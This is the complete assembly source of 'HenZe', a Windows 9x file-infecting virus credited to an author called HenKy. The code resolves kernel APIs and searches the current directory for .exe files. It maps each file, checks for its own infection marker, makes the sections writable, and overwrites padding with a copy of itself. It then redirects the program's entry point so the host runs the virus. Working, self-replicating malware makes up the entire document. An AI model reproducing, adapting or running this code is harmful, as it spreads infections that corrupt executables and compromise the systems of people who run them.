;----------------------------  W95 HenZe BY HenKy -----------------------------
;
;-AUTHOR:        HenKy
;
;-MAIL:          HenKy_@latinmail.com
;
;-ORIGIN:        SPAIN
;


.586P
.MODEL FLAT
LOCALS


EXTRN       ExitProcess:PROC

KERNEL95    EQU 0BFF70000h
MIX_SIZ     EQU FILE_END-MEGAMIX
MIX_MEM     EQU MEM_END-MEGAMIX
NABLA       EQU DELTA-MEGAMIX
MARKA       EQU 66
FLAGZ       EQU 00000020H OR 20000000H OR 80000000H
MAX_PATH    EQU 260

MACROSIZE   MACRO

            DB      MIX_SIZ/01000 mod 10 + "0"
            DB      MIX_SIZ/00100 mod 10 + "0"
            DB      MIX_SIZ/00010 mod 10 + "0"
            DB      MIX_SIZ/00001 mod 10 + "0"

            ENDM

    ; LAME W9X PARASITIC RUNTIME PADDINGX OVERWRITER
    ; INFECTED FILES WONT GROW, BUT NEED PADDINGX SERIES (USSUALLY AT RELOC SECTION)

	; MOV 
	; CALL 
	; JNZ      ONLY SIX OPCODES WERE USED.. xDDD
	; ADD   /
	; SUB  /
	; CMP /

		 ; AND NO INDEXING MODE (EASY DISASM CODE)

		;MOV EAX,[EBP+5]

		;TURNS INTO:

		; ADD EBP,5
		; MOV EAX,[EBP]

		;AND SO...

       ; *INFINITE* THX TO T00FiC FOR THE REDUCED OPCODE SET IDEA AND

       ;  SEVERAL META TIPS

.DATA

copyrisgt   DB 'HenZe '

        MACROSIZE
.CODE

           ; BIZARRE VIRUS BEGINS...
MEGAMIX:


        MOV     EAX, 401005H
   MILO EQU     $-4
DELTA:
        MOV     EBP,EAX
WINES:
        MOV     EAX,KERNEL95
        MOV     CL,'M'
        CMP     BYTE PTR [EAX],CL
        JNZ     WARNING
        MOV     EBX,EAX
        MOV     EDX,02b226A57h ; GPA SIGNATURE FOR W9X

BUSCA3:
        ADD     EAX,1
        CMP     DWORD PTR [EAX],EDX
        JNZ     SHORT BUSCA3
 APIZ:

        MOV     ECX,OFFSET GPA
        ADD     ECX,EBP
        SUB     ECX,OFFSET DELTA
        MOV     [ECX],EAX
        MOV     ESI, OFFSET APIs
        ADD     ESI,EBP
        SUB     ESI,OFFSET DELTA
        MOV     EDI,OFFSET APIaddresses
        ADD     EDI,EBP
        SUB     EDI,OFFSET DELTA

GPI:    SUB     ESP,4
        MOV     [ESP],ESI
        SUB     ESP,4
        MOV     [ESP],EBX
        MOV     ECX,OFFSET GPA
        ADD     ECX,EBP
        SUB     ECX,OFFSET DELTA
        CALL    [ECX]

        MOV     [EDI],EAX
        ADD     EDI,4


 NPI:
        MOV     AL,BYTE PTR [ESI]
        ADD     ESI,1

        CMP     AL,0
        JNZ     SHORT NPI
        CMP     [ESI], AL
        JNZ     GPI



INFECT:

        MOV     EAX, OFFSET Win32FindData
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX
        MOV     EAX,OFFSET IMASK
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX
        MOV     EAX,OFFSET FindFirstFile
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]
        MOV     EBX, OFFSET SearcHandle
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        MOV     [EBX],EAX


LOOPER:
        CMP     EAX,-1
        JNZ     SUPPER


WARNING:

        MOV     EAX,12345678H
        ORG     $-4
OLD_EIP DD      00401000H
        ADD     ESP,4
        CALL    EAX   ; SUXXX!!! I DONT WANT TO WASTE JMP HERE

SUPPER:

        CMP      EAX,0
        JNZ      ALLKEY
PILLE:
        CMP      ESP,0   ; ESP NEVER IS ZERO
        JNZ      WARNING

ALLKEY:

        SUB     ESP,4
        MOV     EAX,OFFSET OLD_EIP
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        MOV     EBX,[EAX]
        MOV     [ESP],EBX
        SUB     ESP,4
        MOV     [ESP],EDX
        SUB     ESP,4
        MOV     [ESP],00000080h
        SUB     ESP,4
        MOV     [ESP],3
        SUB     ESP,4
        MOV     [ESP],EDX
        SUB     ESP,4
        MOV     [ESP],EDX
        SUB     ESP,4
        MOV     [ESP],0C0000000h

        MOV     EAX ,offset FNAME        ; OPEN IT!
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX
        MOV     EAX, OFFSET CreateFile
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]

        MOV     EBX,OFFSET FileHandle
        ADD     EBX,EBP
        SUB     EBX, OFFSET DELTA
        MOV     [EBX],EAX  ; SAVE HNDL
        MOV     EBX,OFFSET WFD_nFileSizeLow
        ADD     EBX,EBP
        SUB     EBX, OFFSET DELTA
        MOV     ECX, [EBX]

        MOV     EDX,0
        SUB     ESP,4
        MOV     [ESP],EDX
        SUB     ESP,4
        MOV     [ESP],ECX
        SUB     ESP,4
        MOV     [ESP],EDX
        SUB     ESP,4
        MOV     [ESP],4H
        SUB     ESP,4
        MOV     [ESP],EDX

        SUB     ESP,4
        MOV     EBX,OFFSET FileHandle
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        MOV     ECX,[EBX]
        MOV     [ESP],ECX
        MOV     EAX, OFFSET CreateFileMappingA
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]

        MOV     EBX,OFFSET MapHandle
        ADD     EBX,EBP
        SUB     EBX, OFFSET DELTA
        MOV     [EBX],EAX

        MOV     EBX,OFFSET WFD_nFileSizeLow
        ADD     EBX,EBP
        SUB     EBX, OFFSET DELTA
        MOV     ECX, [EBX]

        MOV     EDX,0
        SUB     ESP,4
        MOV     [ESP],ECX
        SUB     ESP,4
        MOV     [ESP],EDX
        SUB     ESP,4
        MOV     [ESP],EDX
        ADD     EDX,2
        SUB     ESP,4
        MOV     [ESP],EDX
        SUB     ESP,4
        MOV     ECX, OFFSET MapHandle
        ADD     ECX,EBP
        SUB     ECX,OFFSET DELTA
        MOV     EBX,[ECX]
        MOV     [ESP],EBX
        MOV     EBX, OFFSET MapViewOfFile
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        CALL    [EBX]

        MOV     EBX,OFFSET  MapAddress
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        MOV     [EBX],EAX
        MOV     ESI,EAX                         ; GET PE HDR
        MOV     EDX,EAX
        ADD     EAX,3CH
        MOV     ESI,[EAX]
        ADD     ESI,EDX
        CMP     BYTE PTR [ESI],"P"            ; IS A 'P'E ?
        JNZ     Cerrar
        ADD     ESI,MARKA
        CMP     BYTE PTR [ESI],"H"     ; HenKy IS HERE ?
        JNZ     Cerrar1
        CMP     ESP,0
        JNZ     Cerrar

Cerrar1:
        SUB     ESI,MARKA
        MOV     EBX,ESI
        ADD     EBX,3CH
        MOV     EAX,[EBX] ; ONLY SOME W98  HAVE 1000H/1000H INSTEAD 1000H/200H
        MOV     ECX,ESI
        ADD     ECX,56
        CMP     EAX,[ECX]
        JNZ     Cerrar

        SUB     ESP,4
        MOV     [ESP],ESI
        MOV     ECX,0
        MOV     EDI,ESI
        ADD     EDI,6
        MOV     CL,BYTE PTR [EDI]
        ADD     EDI,74H-6
        MOV     EBX,[EDI]
        ADD     EBX,EBX
        ADD     EBX,EBX
        ADD     EBX,EBX
        ADD     ESI,78H
        ADD     ESI,EBX
        ADD     ESI,24H
 WRI:
        MOV     DWORD PTR [ESI], 0C0000040h
        ADD     ESI,40
        SUB     ECX,1
        CMP     ECX,0
        JNZ     WRI

        MOV     ESI,[ESP]
        ADD     ESP,4

        MOV     EDI,ESI
        ADD     ESI,28H
        MOV     EAX,[ESI]
        ADD     ESI,34H-28H
        ADD     EAX,[ESI]
        MOV     ECX,[ESI]
        MOV     EDX,OFFSET BASE
        ADD     EDX,EBP
        SUB     EDX,OFFSET DELTA
        MOV     [EDX],ECX
        MOV     EBX,OFFSET OLD_EIP
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        MOV     [EBX],EAX
        MOV     ESI,EDI
        ADD     ESI,MARKA
        MOV     BYTE PTR [ESI],"H" ;  HenKy!
        MOV     EAX,OFFSET WFD_nFileSizeLow
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        MOV     ECX,[EAX]
        MOV     EAX,EDI
 BU:
        CMP     DWORD PTR [EDI], 'XGNI'
        JNZ     PE
        CMP     ESP,0
        JNZ     PO

 PE:
        ADD     EDI,1
        SUB     ECX,1
        CMP     ECX,0
        JNZ     BU
        CMP     ESP,0
        JNZ     Cerrar

PO:
        MOV     ESI,EDI
        ADD     ESI,4
        CMP     DWORD PTR [ESI], 'DAPX'
        JNZ     PE
        SUB     ESP,4
        MOV     [ESP],EDI
        MOV     EBX,OFFSET MapAddress
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        SUB     EDI,[EBX]
        ADD     EAX,28H
        MOV     [EAX],EDI
        MOV     EBX,OFFSET BASE
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        ADD     EDI,[EBX]
        ADD     EDI,5
        MOV     EDX,OFFSET MILO
        ADD     EDX,EBP
        SUB     EDX,OFFSET DELTA
        MOV     [EDX],EDI

        MOV     EDI,[ESP]
        ADD     ESP,4

        MOV     ESI,OFFSET MEGAMIX
        ADD     ESI,EBP
        SUB     ESI,OFFSET DELTA
        MOV     ECX,MIX_SIZ/4

BASTARDO_VIRUS:

        MOV     EAX,[ESI]
        MOV     [EDI],EAX
        ADD     ESI,4
        ADD     EDI,4
        SUB     ECX,1
        CMP     ECX,0
        JNZ     BASTARDO_VIRUS

UnMapFile:

        MOV     EAX, OFFSET MapAddress
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX
        MOV     EAX, OFFSET UnmapViewOfFile
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]

CloseMap:

        MOV     EAX, OFFSET MapHandle
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX
        MOV     EAX, OFFSET CloseHandle
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]


Cerrar:

        MOV     EAX,OFFSET OLD_EIP
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        MOV     EBX,[ESP]
        MOV     [EAX],EBX
        ADD     ESP,4

        MOV     EAX, OFFSET FileHandle
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX
        MOV     EAX, OFFSET CloseHandle
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]


TOPO:


        MOV     EAX, offset Win32FindData
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX

        MOV     EAX, OFFSET SearcHandle
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX
        MOV     EAX, OFFSET FindNextFile
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]
        CMP     ESP,0
        JNZ     LOOPER


APIs:
        DB      "CreateFileA",0
        DB      "CloseHandle",0
        DB      "FindFirstFileA",0
        DB      "FindNextFileA",0
        DB      "MapViewOfFile",0
        DB      "UnmapViewOfFile",0
        DB      "CreateFileMappingA",0
Zero_   DB        0
BASE    DD        0

IMASK   DB       '*.ExE',0
        DB        'HenZe LameVirus BY HenKy',0

align 4

FILE_END               LABEL BYTE

APIaddresses:

CreateFile          DD 0
CloseHandle         DD 0
FindFirstFile       DD 0
FindNextFile        DD 0
MapViewOfFile       DD 0
UnmapViewOfFile     DD 0
CreateFileMappingA  DD 0
GPA                 DD 0
SearcHandle         DD 0
FileHandle          DD 0
MapHandle           DD 0
MapAddress          DD 0

FILETIME                STRUC

FT_dwLowDateTime        DD      ?
FT_dwHighDateTime       DD      ?

FILETIME                ENDS

Win32FindData:

WFD_dwFileAttributes    DD      ?
WFD_ftCreationTime      FILETIME ?
WFD_ftLastAccessTime    FILETIME ?
WFD_ftLastWriteTime     FILETIME ?
WFD_nFileSizeHigh       DD      ?
WFD_nFileSizeLow        DD      ?
WFD_dwReserved0         DD      ?
WFD_dwReserved1         DD      ?
FNAME                   DD      0
                        DD      0
                        DD      0
                        DD      0
                        DD      0
                        DD      0
align 4


MEM_END                LABEL BYTE

EXITPROC:

        PUSH 0
        CALL ExitProcess

ENDS
END MEGAMIX